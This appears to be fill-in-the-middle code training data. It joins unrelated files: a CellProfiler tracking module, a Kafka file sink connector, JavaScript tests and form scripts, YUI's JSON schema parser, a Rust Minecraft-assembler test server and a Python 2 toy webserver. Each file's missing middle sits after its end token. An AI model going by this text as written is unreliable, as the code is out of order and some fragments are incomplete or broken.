trajectory_y[index] = y_diff
#
# DistanceTraveled = Distance traveled from step to step
#
dists[index] = np.sqrt(x_diff * x_diff + y_diff * y_diff)
#
# Integrated distance = accumulated distance for lineage
#
integrated[index] = integrated.get_parent(index, no_parent=0) + dists[index]
#
# Displacement = crow-fly distance from initial ancestor
#
x_tot_diff = this_x - x.get_ancestor(index)
y_tot_diff = this_y - y.get_ancestor(index)
tot_distance = np.sqrt(x_tot_diff * x_tot_diff +
y_tot_diff * y_tot_diff)
displ[index] = tot_distance
#
# Linearity = ratio of displacement and integrated
# distance. NaN for new cells is ok.
#
linearity[index] = tot_distance / integrated[index]
#
# Add 1 to lifetimes / one for new
#
lifetimes[index] = lifetimes.get_parent(index, no_parent=0) + 1
#
# Age = overall lifetime of each label
#
for this_label, this_lifetime in zip(label[index],lifetimes[index]):
age[this_label] = this_lifetime
all_labels = sorted(age.keys())
all_ages = [age[k] for k in all_labels]
if self.wants_lifetime_filtering.value:
labels_to_filter = [k for k, v in age.iteritems() if v <= minimum_lifetime or v >= maximum_lifetime]
for image_number in image_numbers:
index = image_index[image_number]
# Fill in final object ages
this_label = label[index]
this_lifetime = lifetimes[index]
this_age = final_age[index]
ind = np.array(all_labels).searchsorted(this_label)
i = np.array(all_ages)[ind] == this_lifetime
this_age[i] = this_lifetime[i]
final_age[index] = this_age
# Filter object ages below the minimum
if self.wants_lifetime_filtering.value:
if len(labels_to_filter) > 0:
this_label = label[index].astype(float)
this_label[np.in1d(this_label,np.array(labels_to_filter))] = np.NaN
label[index] = this_label
m.add_experiment_measurement(F_EXPT_ORIG_NUMTRACKS, nlabels)
if self.wants_lifetime_filtering.value:
m.add_experiment_measurement(F_EXPT_FILT_NUMTRACKS, nlabels-len(labels_to_filter))
def map_objects(self, workspace, new_of_old, old_of_new, i, j):
'''Record the mapping of old to new objects and vice-versa
workspace - workspace for current image set
new_to_old - an array of the new labels for every old label
old_to_new - an array of the old labels for every new label
i, j - the coordinates for each new object.
'''
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
image_number = m.get_current_image_measurement(cpp.IMAGE_NUMBER)
new_of_old = new_of_old.astype(int)
old_of_new = old_of_new.astype(int)
old_object_numbers = self.get_saved_object_numbers(workspace).astype(int)
max_object_number = self.get_max_object_number(workspace)
old_count = len(new_of_old)
new_count = len(old_of_new)
#
# Record the new objects' parents
#
parents = old_of_new.copy()
parents[parents != 0] =\
old_object_numbers[(old_of_new[parents!=0]-1)].astype(parents.dtype)
self.add_measurement(workspace, F_PARENT_OBJECT_NUMBER, old_of_new)
parent_image_numbers = np.zeros(len(old_of_new))
parent_image_numbers[parents != 0] = image_number - 1
self.add_measurement(workspace, F_PARENT_IMAGE_NUMBER,
parent_image_numbers)
#
# Assign object IDs to the new objects
#
mapping = np.zeros(new_count, int)
if old_count > 0 and new_count > 0:
mapping[old_of_new != 0] = \
old_object_numbers[old_of_new[old_of_new != 0] - 1]
miss_count = np.sum(old_of_new == 0)
lost_object_count = np.sum(new_of_old == 0)
else:
miss_count = new_count
lost_object_count = old_count
nunmapped = np.sum(mapping==0)
new_max_object_number = max_object_number + nunmapped
mapping[mapping == 0] = np.arange(max_object_number+1,
new_max_object_number + 1)
self.set_max_object_number(workspace, new_max_object_number)
self.add_measurement(workspace, F_LABEL, mapping)
self.set_saved_object_numbers(workspace, mapping)
#
# Compute distances and trajectories
#
diff_i = np.zeros(new_count)
diff_j = np.zeros(new_count)
distance = np.zeros(new_count)
integrated_distance = np.zeros(new_count)
displacement = np.zeros(new_count)
linearity = np.ones(new_count)
orig_i = i.copy()
orig_j = j.copy()
old_i, old_j = self.get_saved_coordinates(workspace)
old_distance = self.get_saved_distances(workspace)
old_orig_i, old_orig_j = self.get_orig_coordinates(workspace)
has_old = (old_of_new != 0)
if np.any(has_old):
old_indexes = old_of_new[has_old]-1
orig_i[has_old] = old_orig_i[old_indexes]
orig_j[has_old] = old_orig_j[old_indexes]
diff_i[has_old] = i[has_old] - old_i[old_indexes]
diff_j[has_old] = j[has_old] - old_j[old_indexes]
distance[has_old] = np.sqrt(diff_i[has_old]**2 + diff_j[has_old]**2)
integrated_distance[has_old] = (old_distance[old_indexes] + distance[has_old])
displacement[has_old] = np.sqrt((i[has_old]-orig_i[has_old])**2 + (j[has_old]-orig_j[has_old])**2)
linearity[has_old] = displacement[has_old] / integrated_distance[has_old]
self.add_measurement(workspace, F_TRAJECTORY_X, diff_j)
self.add_measurement(workspace, F_TRAJECTORY_Y, diff_i)
self.add_measurement(workspace, F_DISTANCE_TRAVELED, distance)
self.add_measurement(workspace, F_DISPLACEMENT, displacement)
self.add_measurement(workspace, F_INTEGRATED_DISTANCE, integrated_distance)
self.add_measurement(workspace, F_LINEARITY, linearity)
self.set_saved_distances(workspace, integrated_distance)
self.set_orig_coordinates(workspace, (orig_i, orig_j))
self.set_saved_coordinates(workspace, (i,j))
#
# Update the ages
#
age = np.ones(new_count, int)
if np.any(has_old):
old_age = self.get_saved_ages(workspace)
age[has_old] = old_age[old_of_new[has_old]-1]+1
self.add_measurement(workspace, F_LIFETIME, age)
final_age = np.NaN*np.ones(new_count, float) # Initialize to NaN; will re-calc later
self.add_measurement(workspace, F_FINAL_AGE, final_age)
self.set_saved_ages(workspace, age)
self.set_saved_object_numbers(workspace, mapping)
#
# Add image measurements
#
self.add_image_measurement(workspace, F_NEW_OBJECT_COUNT,
np.sum(parents==0))
self.add_image_measurement(workspace, F_LOST_OBJECT_COUNT,
lost_object_count)
#
# Find parents with more than one child. These are the progenitors
# for daughter cells.
#
if np.any(parents != 0):
h = np.bincount(parents[parents != 0])
split_count = np.sum(h > 1)
else:
split_count = 0
self.add_image_measurement(workspace, F_SPLIT_COUNT, split_count)
#
# Find children with more than one parent. These are the merges
#
if np.any(new_of_old != 0):
h = np.bincount(new_of_old[new_of_old != 0])
merge_count = np.sum(h > 1)
else:
merge_count = 0
self.add_image_measurement(workspace, F_MERGE_COUNT, merge_count)
#########################################
#
# Compile the relationships between children and parents
#
#########################################
last_object_numbers = np.arange(1, len(new_of_old) + 1)
new_object_numbers = np.arange(1, len(old_of_new)+1)
r_parent_object_numbers = np.hstack((
old_of_new[old_of_new != 0],
last_object_numbers[new_of_old != 0]))
r_child_object_numbers = np.hstack((
new_object_numbers[parents != 0], new_of_old[new_of_old != 0]))
if len(r_child_object_numbers) > 0:
#
# Find unique pairs
#
order = np.lexsort((r_child_object_numbers, r_parent_object_numbers))
r_child_object_numbers = r_child_object_numbers[order]
r_parent_object_numbers = r_parent_object_numbers[order]
to_keep = np.hstack((
[True],
(r_parent_object_numbers[1:] != r_parent_object_numbers[:-1]) |
(r_child_object_numbers[1:] != r_child_object_numbers[:-1])))
r_child_object_numbers = r_child_object_numbers[to_keep]
r_parent_object_numbers = r_parent_object_numbers[to_keep]
r_image_numbers = np.ones(
r_parent_object_numbers.shape[0],
r_parent_object_numbers.dtype) * image_number
if len(r_child_object_numbers) > 0:
m.add_relate_measurement(
self.module_num, R_PARENT,
self.object_name.value, self.object_name.value,
r_image_numbers - 1, r_parent_object_numbers,
r_image_numbers, r_child_object_numbers)
def get_kalman_feature_names(self):
if self.tracking_method != TM_LAP:
return []
return sum(
[sum(
[[ kalman_feature(model, F_STATE, element),
kalman_feature(model, F_NOISE, element)] +
[ kalman_feature(model, F_COV, element, e2)
for e2 in elements]
for element in elements],[])
for model, elements in self.get_kalman_models()], [])
def get_measurement_columns(self, pipeline):
result = [(self.object_name.value,
self.measurement_name(feature),
coltype)
for feature, coltype in F_ALL_COLTYPE_ALL]
result += [(cpmeas.IMAGE, self.image_measurement_name(feature), coltype)
for feature, coltype in F_IMAGE_COLTYPE_ALL]
if self.tracking_method == TM_LAP:
result += [( self.object_name.value,
self.measurement_name(name),
coltype) for name, coltype in (
(F_AREA, cpmeas.COLTYPE_INTEGER),
(F_LINK_TYPE, cpmeas.COLTYPE_INTEGER),
(F_LINKING_DISTANCE, cpmeas.COLTYPE_FLOAT),
(F_STANDARD_DEVIATION, cpmeas.COLTYPE_FLOAT),
(F_MOVEMENT_MODEL, cpmeas.COLTYPE_INTEGER))]
result += [( self.object_name.value,
self.measurement_name(name),
cpmeas.COLTYPE_FLOAT) for name in
list(self.get_kalman_feature_names())]
if self.wants_second_phase:
result += [
(self.object_name.value, self.measurement_name(name), coltype)
for name, coltype in (
(F_GAP_LENGTH, cpmeas.COLTYPE_INTEGER),
(F_GAP_SCORE, cpmeas.COLTYPE_FLOAT),
(F_MERGE_SCORE, cpmeas.COLTYPE_FLOAT),
(F_SPLIT_SCORE, cpmeas.COLTYPE_FLOAT),
(F_MITOSIS_SCORE, cpmeas.COLTYPE_FLOAT))]
# Add the post-group attribute to all measurements
attributes = { cpmeas.MCA_AVAILABLE_POST_GROUP: True }
result = [ ( c[0], c[1], c[2], attributes) for c in result]
return result
def get_object_relationships(self, pipeline):
'''Return the object relationships produced by this module'''
object_name = self.object_name.value
if self.wants_second_phase and self.tracking_method == TM_LAP:
when = cpmeas.MCA_AVAILABLE_POST_GROUP
else:
when = cpmeas.MCA_AVAILABLE_EACH_CYCLE
return [(R_PARENT, object_name, object_name, when)]
def get_categories(self, pipeline, object_name):
if object_name in (self.object_name.value, cpmeas.IMAGE):
return [F_PREFIX]
elif object_name == cpmeas.EXPERIMENT:
return [F_PREFIX]
else:
return []
def get_measurements(self, pipeline, object_name, category):
if object_name == self.object_name.value and category == F_PREFIX:
result = list(F_ALL)
if self.tracking_method == TM_LAP:
result += [F_AREA, F_LINKING_DISTANCE, F_STANDARD_DEVIATION,
F_LINK_TYPE, F_MOVEMENT_MODEL]
if self.wants_second_phase:
result += [F_GAP_LENGTH, F_GAP_SCORE, F_MERGE_SCORE,
F_SPLIT_SCORE, F_MITOSIS_SCORE]
result += self.get_kalman_feature_names()
return result
if object_name == cpmeas.IMAGE:
result = F_IMAGE_ALL
return result
if object_name == cpmeas.EXPERIMENT and category == F_PREFIX:
return [F_EXPT_ORIG_NUMTRACKS, F_EXPT_FILT_NUMTRACKS]
return []
def get_measurement_objects(self, pipeline, object_name, category,
measurement):
if (object_name == cpmeas.IMAGE and category == F_PREFIX and
measurement in F_IMAGE_ALL):
return [ self.object_name.value]
return []
def get_measurement_scales(self, pipeline, object_name, category, feature,image_name):
if self.tracking_method == TM_LAP:
return []
if feature in self.get_measurements(pipeline, object_name, category):
return [str(self.pixel_radius.value)]
return []
def upgrade_settings(self, setting_values, variable_revision_number,
module_name, from_matlab):
if from_matlab and variable_revision_number == 3:
wants_image = setting_values[10] != cps.DO_NOT_USE
measurement = '_'.join(setting_values[2:6])
setting_values = [ setting_values[0], # tracking method
setting_values[1], # object name
measurement,
setting_values[6], # pixel_radius
setting_values[7], # display_type
wants_image,
setting_values[10]]
variable_revision_number = 1
from_matlab = False
if (not from_matlab) and variable_revision_number == 1:
setting_values = setting_values + ["100","100"]
variable_revision_number = 2
if (not from_matlab) and variable_revision_number == 2:
# Added phase 2 parameters
setting_values = setting_values + [
"40","40","40","50","50","50","5"]
variable_revision_number = 3
if (not from_matlab) and variable_revision_number == 3:
# Added Kalman choices:
# Model
# radius std
# radius limit
setting_values = (setting_values[:7] +
[ M_BOTH, "3", "2,10"] +
setting_values[9:])
variable_revision_number = 4<|fim▁hole|> variable_revision_number = 5
if (not from_matlab) and variable_revision_number == 5:
# Added mitosis alternative score + mitosis_max_distance
setting_values = setting_values + ["80", "40"]
variable_revision_number = 6
return setting_values, variable_revision_number, from_matlab<|fim▁end|> |
if (not from_matlab) and variable_revision_number == 4:
# Added lifetime filtering: Wants filtering + min/max allowed lifetime
setting_values = setting_values + [cps.NO, cps.YES, "1", cps.NO, "100"] |
<|file_name|>FileStreamSinkConnector.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.file;
import org.apache.kafka.common.config.ConfigDef;
import org.apache.kafka.common.config.ConfigDef.Importance;
import org.apache.kafka.common.config.ConfigDef.Type;
import org.apache.kafka.common.utils.AppInfoParser;
import org.apache.kafka.connect.connector.Task;
import org.apache.kafka.connect.sink.SinkConnector;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
 * Very simple sink connector that works with the console or a file. Records
 * consumed from Kafka are appended to the destination given by the 'file'
 * setting; when no file is configured, the task writes to standard output.
 */
public class FileStreamSinkConnector extends SinkConnector {
public static final String FILE_CONFIG = "file";
private static final ConfigDef CONFIG_DEF = new ConfigDef()
.define(FILE_CONFIG, Type.STRING, Importance.HIGH, "Destination filename.");
private String filename;
@Override
public String version() {<|fim▁hole|> public void start(Map<String, String> props) {
filename = props.get(FILE_CONFIG);
}
@Override
public Class<? extends Task> taskClass() {
return FileStreamSinkTask.class;
}
@Override
public List<Map<String, String>> taskConfigs(int maxTasks) {
ArrayList<Map<String, String>> configs = new ArrayList<>();
for (int i = 0; i < maxTasks; i++) {
Map<String, String> config = new HashMap<>();
if (filename != null)
config.put(FILE_CONFIG, filename);
configs.add(config);
}
return configs;
}
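// Illustrative note (behavior inferred from the code above): taskConfigs(2)
// with file=/tmp/out.txt returns two identical maps {"file": "/tmp/out.txt"},
// so every task appends to the same destination file.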
@Override
public void stop() {
// Nothing to do since FileStreamSinkConnector has no background monitoring.
}
@Override
public ConfigDef config() {
return CONFIG_DEF;
}
}<|fim▁end|> | return AppInfoParser.getVersion();
}
@Override |
<|file_name|>dest.js<|end_file_name|><|fim▁begin|>var through = require('through2');
var should = require('should');
var dat = require('dat');
var File = require('vinyl');
var bops = require('bops');
var vdat = require('..');
describe('dest stream', function () {
var destPath = 'test/data/test-dest';
beforeEach(function (done) {
var db = dat(destPath, function (err) {
if (err) return done(err);
db.destroy(done);
});
});
it('should be a stream', function (done) {
var db = dat(destPath, function (err) {
if (err) return done(err);
var output = vdat.dest(db);
should.exist(output.pipe);
output.on('end', function () {
db.close(done);
});
output.write({foo: 'bar'});
output.end();
});
});
it('should write a vinyl file to dat', function (done) {
var expected = new File({
path: 'test-001',
contents: bops.from(JSON.stringify({foo: 'bar'}))
});
var db = dat(destPath, function (err) {
if (err) return done(err);
var output = vdat.dest(db);
output.on('end', function () {
db.get('test-001', function (err, record) {
if (err) done(err);
should.exist(record);
should.exist(record.version);
record.version.should.eql(1);
db.close(done);
});
});
output.write(expected);
output.end();
});
});<|fim▁hole|>
});<|fim▁end|> | |
<|file_name|>dataschema-json.js<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 3.3.0
build: 3167
*/
YUI.add('dataschema-json', function(Y) {
/**
* Provides a DataSchema implementation which can be used to work with JSON data.
*
* @module dataschema
* @submodule dataschema-json
*/
/**
* JSON subclass for the DataSchema Utility.
* @class DataSchema.JSON
* @extends DataSchema.Base
* @static
*/
var LANG = Y.Lang,
SchemaJSON = {
/////////////////////////////////////////////////////////////////////////////
//
// DataSchema.JSON static methods
//
/////////////////////////////////////////////////////////////////////////////
/**
* Utility function converts JSON locator strings into walkable paths
*
* @method DataSchema.JSON.getPath
* @param locator {String} JSON value locator.
* @return {String[]} Walkable path to data value.
* @static
*/
getPath: function(locator) {
var path = null,
keys = [],
i = 0;
if (locator) {
// Strip the ["string keys"] and [1] array indexes
locator = locator.
replace(/\[(['"])(.*?)\1\]/g,
function (x,$1,$2) {keys[i]=$2;return '.@'+(i++);}).
replace(/\[(\d+)\]/g,
function (x,$1) {keys[i]=parseInt($1,10)|0;return '.@'+(i++);}).
replace(/^\./,''); // remove leading dot
// Validate against problematic characters.
if (!/[^\w\.\$@]/.test(locator)) {
path = locator.split('.');
for (i=path.length-1; i >= 0; --i) {
if (path[i].charAt(0) === '@') {
path[i] = keys[parseInt(path[i].substr(1),10)];
}
}
}
else {
}
}
return path;
},
/**
* Utility function to walk a path and return the value located there.
*
* @method DataSchema.JSON.getLocationValue
* @param path {String[]} Locator path.
* @param data {String} Data to traverse.
* @return {Object} Data value at location.
* @static
*/
getLocationValue: function (path, data) {
var i = 0,
len = path.length;
for (;i<len;i++) {
if(
LANG.isObject(data) &&
(path[i] in data)
) {
data = data[path[i]];
}
else {
data = undefined;
break;
}
}
return data;
},
/**
* Applies a given schema to given JSON data.
*
* @method apply
* @param schema {Object} Schema to apply.
* @param data {Object} JSON data.
* @return {Object} Schema-parsed data.
* @static
*/
apply: function(schema, data) {
var data_in = data,
data_out = {results:[],meta:{}};
// Convert incoming JSON strings
if(!LANG.isObject(data)) {
try {
data_in = Y.JSON.parse(data);
}
catch(e) {
data_out.error = e;
return data_out;
}
}
if(LANG.isObject(data_in) && schema) {
// Parse results data
if(!LANG.isUndefined(schema.resultListLocator)) {
data_out = SchemaJSON._parseResults.call(this, schema, data_in, data_out);
}
// Parse meta data
if(!LANG.isUndefined(schema.metaFields)) {
data_out = SchemaJSON._parseMeta(schema.metaFields, data_in, data_out);
}
}
else {
data_out.error = new Error("JSON schema parse failure");
}
return data_out;
},
/**
* Schema-parsed list of results from full data
*
* @method _parseResults
* @param schema {Object} Schema to parse against.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_parseResults: function(schema, json_in, data_out) {
var results = [],
path,
error;
if(schema.resultListLocator) {
path = SchemaJSON.getPath(schema.resultListLocator);
if(path) {
results = SchemaJSON.getLocationValue(path, json_in);
if (results === undefined) {
data_out.results = [];
error = new Error("JSON results retrieval failure");
}
else {
if(LANG.isArray(results)) {
// if no result fields are passed in, then just take the results array whole-hog
// Sometimes you're getting an array of strings, or want the whole object,
// so resultFields don't make sense.
if (LANG.isArray(schema.resultFields)) {
data_out = SchemaJSON._getFieldValues.call(this, schema.resultFields, results, data_out);
}
else {
data_out.results = results;
}
}
else {
data_out.results = [];
error = new Error("JSON Schema fields retrieval failure");<|fim▁hole|> }
else {
error = new Error("JSON Schema results locator failure");
}
if (error) {
data_out.error = error;
}
}
return data_out;
},
/**
* Get field data values out of list of full results
*
* @method _getFieldValues
* @param fields {Array} Fields to find.
* @param array_in {Array} Results to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_getFieldValues: function(fields, array_in, data_out) {
var results = [],
len = fields.length,
i, j,
field, key, locator, path, parser,
simplePaths = [], complexPaths = [], fieldParsers = [],
result, record;
// First collect hashes of simple paths, complex paths, and parsers
for (i=0; i<len; i++) {
field = fields[i]; // A field can be a simple string or a hash
key = field.key || field; // Find the key
locator = field.locator || key; // Find the locator
// Validate and store locators for later
path = SchemaJSON.getPath(locator);
if (path) {
if (path.length === 1) {
simplePaths[simplePaths.length] = {key:key, path:path[0]};
} else {
complexPaths[complexPaths.length] = {key:key, path:path};
}
} else {
}
// Validate and store parsers for later
//TODO: use Y.DataSchema.parse?
parser = (LANG.isFunction(field.parser)) ? field.parser : Y.Parsers[field.parser+''];
if (parser) {
fieldParsers[fieldParsers.length] = {key:key, parser:parser};
}
}
// Traverse list of array_in, creating records of simple fields,
// complex fields, and applying parsers as necessary
for (i=array_in.length-1; i>=0; --i) {
record = {};
result = array_in[i];
if(result) {
// Cycle through simpleLocators
for (j=simplePaths.length-1; j>=0; --j) {
// Bug 1777850: The result might be an array instead of object
record[simplePaths[j].key] = Y.DataSchema.Base.parse.call(this,
(LANG.isUndefined(result[simplePaths[j].path]) ?
result[j] : result[simplePaths[j].path]), simplePaths[j]);
}
// Cycle through complexLocators
for (j=complexPaths.length - 1; j>=0; --j) {
record[complexPaths[j].key] = Y.DataSchema.Base.parse.call(this,
(SchemaJSON.getLocationValue(complexPaths[j].path, result)), complexPaths[j] );
}
// Cycle through fieldParsers
for (j=fieldParsers.length-1; j>=0; --j) {
key = fieldParsers[j].key;
record[key] = fieldParsers[j].parser.call(this, record[key]);
// Safety net
if (LANG.isUndefined(record[key])) {
record[key] = null;
}
}
results[i] = record;
}
}
data_out.results = results;
return data_out;
},
/**
* Parses results data according to schema
*
* @method _parseMeta
* @param metaFields {Object} Metafields definitions.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Schema-parsed meta data.
* @static
* @protected
*/
_parseMeta: function(metaFields, json_in, data_out) {
if(LANG.isObject(metaFields)) {
var key, path;
for(key in metaFields) {
if (metaFields.hasOwnProperty(key)) {
path = SchemaJSON.getPath(metaFields[key]);
if (path && json_in) {
data_out.meta[key] = SchemaJSON.getLocationValue(path, json_in);
}
}
}
}
else {
data_out.error = new Error("JSON meta data retrieval failure");
}
return data_out;
}
};
Y.DataSchema.JSON = Y.mix(SchemaJSON, Y.DataSchema.Base);
}, '3.3.0' ,{requires:['dataschema-base','json']});<|fim▁end|> | }
} |
<|file_name|>guimporter.py<|end_file_name|><|fim▁begin|>#guimporter.py<|fim▁hole|>
from PySide import QtGui, QtCore, QtWebKit
Signal = QtCore.Signal<|fim▁end|> | import sys |
<|file_name|>supplier.js<|end_file_name|><|fim▁begin|>// Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
// License: GNU General Public License v3. See license.txt<|fim▁hole|> },
refresh: function(frm) {
if(frappe.defaults.get_default("supp_master_name")!="Naming Series") {
frm.toggle_display("naming_series", false);
} else {
erpnext.toggle_naming_series();
}
if(frm.doc.__islocal){
hide_field(['address_html','contact_html']);
erpnext.utils.clear_address_and_contact(frm);
}
else {
unhide_field(['address_html','contact_html']);
erpnext.utils.render_address_and_contact(frm);
}
},
});
cur_frm.fields_dict['default_price_list'].get_query = function(doc, cdt, cdn) {
return{
filters:{'buying': 1}
}
}
cur_frm.fields_dict['accounts'].grid.get_field('account').get_query = function(doc, cdt, cdn) {
var d = locals[cdt][cdn];
return {
filters: {
'account_type': 'Payable',
'company': d.company,
"is_group": 0
}
}
}<|fim▁end|> |
frappe.ui.form.on("Supplier", {
before_load: function(frm) {
frappe.setup_language_field(frm); |
<|file_name|>workform.js<|end_file_name|><|fim▁begin|>$(document).ready(function() {
$.viewMap = {
'install' : $('#coordinator_row'),
'repair' : $('#barcode_row, #equipment_row')
};
$('#coordinator_row').hide();<|fim▁hole|> $.each($.viewMap, function() { this.hide(); });
// show current
$.viewMap[$(this).val()].show();
});
});<|fim▁end|> |
$('#id_work_type').change(function() {
// hide all |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, Christopher Chambers
// Distributed under the GNU GPL v3. See COPYING for details.
use regex::Regex;
use sbbm_asm::assembler::Assembler;
use sbbm_asm::commands::{Command, Target, IntoTarget, players};
use sbbm_asm::fab;
use sbbm_asm::hw::{Computer, MemoryRegion, MemoryStride};
use sbbm_asm::layout::{Layout, LinearMotion};
use sbbm_asm::lexer::Lexer;
use sbbm_asm::nbt::Nbt;
use sbbm_asm::parser::Parser;
use sbbm_asm::types::{Extent, Vec3};
use std::env;
use std::fs::{self, File, OpenOptions};
use std::io::{self, BufRead, BufReader, Read, Write};
use std::mem;
use std::path::PathBuf;
use std::rt::at_exit;
use std::sync::{MutexGuard, Once, StaticMutex, MUTEX_INIT, ONCE_INIT};
const ORIGIN: Vec3 = Vec3 { x: 0, y: 56, z: 0 };
static mut COMPUTER: *const Computer = 0 as *const Computer;
static COMPUTER_INIT: Once = ONCE_INIT;
static SERVER_MUTEX: StaticMutex = MUTEX_INIT;
static SET_REGEX: Regex = regex!(
r"Set score of (\w+) for player .+ to (-?\d+)");
fn server_path() -> PathBuf {
let mut path = PathBuf::from(env::var("CARGO_MANIFEST_DIR").unwrap());
path.push("..");
path.push("server");
path
}
fn input_path() -> PathBuf {
let mut p = server_path();
p.push("input");
p
}
fn output_path() -> PathBuf {
let mut p = server_path();
p.push("output");
p
}
fn capture_path() -> PathBuf {
let mut p = server_path();
p.push("capture");
p
}
<|fim▁hole|>pub struct Server {
_guard: MutexGuard<'static, ()>,
}
impl Server {
pub fn new() -> Server {
let guard = SERVER_MUTEX.lock().unwrap();
COMPUTER_INIT.call_once(|| {
init_computer();
at_exit(destroy_computer).unwrap();
});
let server = Server {
_guard: guard,
};
// Wait for any noise to die down.
server.capture(|| {});
server
}
pub fn write(&self, cmd: &Command) -> io::Result<()> {
let mut f = OpenOptions::new()
.write(true)
.append(true)
.open(input_path())
.unwrap();
write!(f, "{}\n", cmd)
}
pub fn exec(&self, cmd: &Command) -> io::Result<String> {
// FIXME: Eliminate all unwrap to prevent poisoning the mutex.
let (_, output) = self.capture_until(|_| true, || {
self.write(cmd).unwrap();
});
Ok(output)
}
pub fn get(&self, target: &Target, obj: &str) -> io::Result<i32> {
let resp = try!(self.exec(
&players::add(target.clone(), obj.to_string(), 0, None)));
if let Some(cap) = SET_REGEX.captures(&resp[..]) {
// TODO: Verify that the objectives match.
// FIXME: Real error handling.
Ok(cap.at(2).unwrap().parse().unwrap())
} else {
panic!("ugh error handling is hard");
}
}
pub fn get_computer(&self, obj: &str) -> io::Result<i32> {
self.get(&computer().selector().into_target(), obj)
}
pub fn capture_until<F, P, T>(&self, p: P, f: F) -> (T, String)
where F : Fn() -> T,
P : Fn(&str) -> bool
{
// FIXME: Eliminate all panics, return some kind of Result<>
File::create(capture_path()).unwrap();
let res = f();
// FIXME: handle errors, good god man.
let out = File::open(output_path()).unwrap();
let mut out = BufReader::new(out);
// FIXME: eeeerrroors
let mut captured = String::new();
loop {
let start = captured.len();
out.read_line(&mut captured).unwrap();
if p(&captured[start..]) { break; }
}
fs::remove_file(capture_path()).unwrap();
(res, captured)
}
pub fn capture<F, T>(&self, f: F) -> (T, String) where F : Fn() -> T {
let marker = "54799be5-7239-4e00-bd9f-095ae6ed58a3";
let (result, mut output) = self.capture_until(|s| s.contains(marker), || {
let result = f();
self.write(&Command::Say(marker.to_string())).unwrap();
result
});
// Remove the marker line from output.
let mut count = 0;
match output.rfind(|c| if c == '\n' { count += 1; count > 1 } else { false }) {
Some(index) => output.truncate(index + 1),
None => output.truncate(0),
}
(result, output)
}
pub fn run_asm(&self, input: &str) {
// FIXME: Eliminate all unwrap to prevent poisoning the mutex.
let marker = "6ee5dd4a-ea5c-476d-bcab-4c2a912ce2ed";
let (dirty_extent, _) = self.capture_until(|s| s.contains(marker), || {
let mut marked = input.to_string();
marked.push_str("\n\traw say ");
marked.push_str(marker);
let mut parser = Parser::new(Lexer::mem(&marked[..]));
let mut assembler = Assembler::new(
computer(), parser.parse_program().into_iter());
assembler.set_track_output(true);
let mem_controllers = {
let mut c = vec!();
for region in computer().memory.iter() {
c.extend(fab::make_mem_ctrl(region));
}
c };
let motion = Box::new(LinearMotion::new(ORIGIN));
let mut layout = Layout::new(motion, assembler.chain(mem_controllers));
let mut dirty_extent = Extent::Empty;
for (pos, block) in &mut layout {
dirty_extent.add(pos);
self.write(&Command::SetBlock(
pos.as_abs(), block.id, None, None,
Some(Nbt::Compound(block.nbt)))).unwrap();
}
if let Some(Extent::MinMax(min, max)) = layout.get_power_extent("main") {
dirty_extent.add(min);
dirty_extent.add(max);
self.write(&Command::Fill(
min.as_abs(), max.as_abs(), "minecraft:redstone_block".to_string(),
None, None, None)).unwrap();
}
dirty_extent
});
self.capture(|| {
if let Extent::MinMax(min, max) = dirty_extent {
self.write(&Command::Fill(
min.as_abs(), max.as_abs(), "minecraft:air".to_string(),
None, None, None)).unwrap();
}
});
}
}
fn computer() -> &'static Computer {
unsafe { mem::transmute(COMPUTER) }
}
fn init_computer() {
unsafe {
COMPUTER = mem::transmute(Box::new(Computer {
name: "computer".to_string(),
origin: ORIGIN,
memory: vec![
MemoryRegion {
start: 0x10,
size: 0x100,
origin: Vec3::new(ORIGIN.x - 1, ORIGIN.y, ORIGIN.z),
growth: Vec3::new(-1, 1, 1),
stride: MemoryStride::XY(8, 8),
}]
}))
}
let mut f = OpenOptions::new()
.write(true)
.append(true)
.open(input_path())
.unwrap();
computer().write_init_script(&mut f).unwrap();
}
fn destroy_computer() {
let mut f = OpenOptions::new()
.write(true)
.append(true)
.create(true)
.open(input_path())
.unwrap();
computer().write_destroy_script(&mut f).unwrap();
}<|fim▁end|> | |
<|file_name|>webserver.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python2
from conf import *
import socket
import os
from threading import Thread
import time
def get_cookie(request_lines):
#print("cookie data is: " + request_lines[-3])
data = request_lines[-3].split(":")[-1]
return (data.split("=")[-1])
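# Example (assuming the usual request layout): for a header line
# "Cookie: session=abc123" this returns "abc123"; it relies on the cookie
# header being the third line from the end of the request.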
def error_404(addr,request_words):
print("File not Found request")
logging(addr,request_words[1][1:],"error","404")
csock.sendall(error_handle(404,"text/html",False))
response = """<html><head><body>file not found</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_403(addr,request_words):
print("Forbidden")
logging(addr,request_words[1][1:],"error","403")
csock.sendall(error_handle(403,"text/html",False))
response = """<html><head><body>Forbidden</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_400(addr,request_words):
print("Bad request")
logging(addr,request_words[1][1:],"error","400")
csock.sendall(error_handle(400,"text/html",False))
	response = """<html><head><body>Bad request</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
